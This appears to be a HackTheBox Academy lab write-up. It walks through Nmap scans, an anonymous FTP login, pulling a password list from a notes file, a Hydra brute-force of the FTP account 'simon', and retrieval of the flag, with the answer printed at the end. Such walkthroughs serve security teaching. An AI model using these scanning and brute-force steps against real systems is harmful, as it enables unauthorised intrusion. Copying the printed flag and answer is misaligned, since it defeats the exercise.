Attacking Common Services - Medium

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Attacking Common Services
🔗 Link: Attacking Common Services - Medium

❓Question¶

Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.

📋 Walkthrough¶

To start, we perform an Nmap scan to identify open ports and services on the target server.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ nmap -p- --min-rate=10000 $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 20:53 UTC
Nmap scan report for inlanefreight.htb (10.129.33.65)
Host is up (0.024s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
110/tcp   open  pop3
995/tcp   open  pop3s
2121/tcp  open  ccproxy-ftp
30021/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Next, we perform a more detailed Nmap scan to gather information about the versions of the services running on the open ports.

Nmap scan report for inlanefreight.htb (10.129.33.65)
Host is up (0.026s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp    open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: STLS CAPA UIDL USER TOP RESP-CODES AUTH-RESP-CODE SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: PIPELINING TOP USER CAPA UIDL AUTH-RESP-CODE SASL(PLAIN) RESP-CODES
2121/tcp  open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.33.65]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
30021/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Internal FTP) [10.129.33.65]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.95%I=7%D=3/20%Time=67DC806C%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.
SF:33\.65\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creat
SF:ive\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r
SF:\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port30021-TCP:V=7.95%I=7%D=3/20%Time=67DC806C%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,8E,"220\x20ProFTPD\x20Server\x20\(Internal\x20FTP\)\x20\[10
SF:\.129\.33\.65\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x
SF:20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
SF:ative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.44 seconds

We attempt to log in to the FTP services on ports 2121 and 30021 using anonymous credentials. The login on port 2121 fails, but the login on port 30021 succeeds.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 2121 
Connected to 10.129.33.65.
220 ProFTPD Server (InlaneFTP) [10.129.33.65]
Name (10.129.33.65:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 30021
Connected to 10.129.33.65.
220 ProFTPD Server (Internal FTP) [10.129.33.65]
Name (10.129.33.65:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> ls -la
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 .
drwxrwxr-x   3 ftp      ftp          4096 Apr 18  2022 ..
-rw-rw-r--   1 ftp      ftp           153 Apr 18  2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
200 EPRT command successful
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***************************************************************************************************************|   153       81.95 KiB/s    00:00 ETA
226 Transfer complete
153 bytes received in 00:00 (5.23 KiB/s)
ftp>

We find a file named mynotes.txt in the simon directory, which contains potential passwords.

Notes:
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81

Using Hydra, we brute-force the FTP login on port 2121 with the username simon and the passwords from mynotes.txt. We successfully find the correct password.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "simon" -P mynotes.txt ftp://$target:2121                   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 21:01:50
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking ftp://10.129.33.65:2121/
[2121][ftp] host: 10.129.33.65   login: simon   password: 8Ns8j1b!23hs4921smHzwn
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 21:02:02

simon:8Ns8j1b!23hs4921smHzwn

We then connect to the FTP service on port 2121 using the valid credentials and retrieve the flag.txt file.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 2121 
Connected to 10.129.33.65.
220 ProFTPD Server (InlaneFTP) [10.129.33.65]
Name (10.129.33.65:kali): simon
331 Password required for simon
Password: 
230 User simon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||20735|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root           29 Apr 20  2022 flag.txt
drwxrwxr-x   3 simon    simon        4096 Apr 18  2022 Maildir
226 Transfer complete
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||35024|)
150 Opening BINARY mode data connection for flag.txt (29 bytes)
    29       13.86 KiB/s 
226 Transfer complete
29 bytes received in 00:00 (0.95 KiB/s)
ftp>

Finally, we read the contents of the flag.txt file to find the flag.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat flag.txt   
HTB{1qay2wsx3EDC4rfv_M3D1UM}

Answer

HTB{1qay2wsx3EDC4rfv_M3D1UM}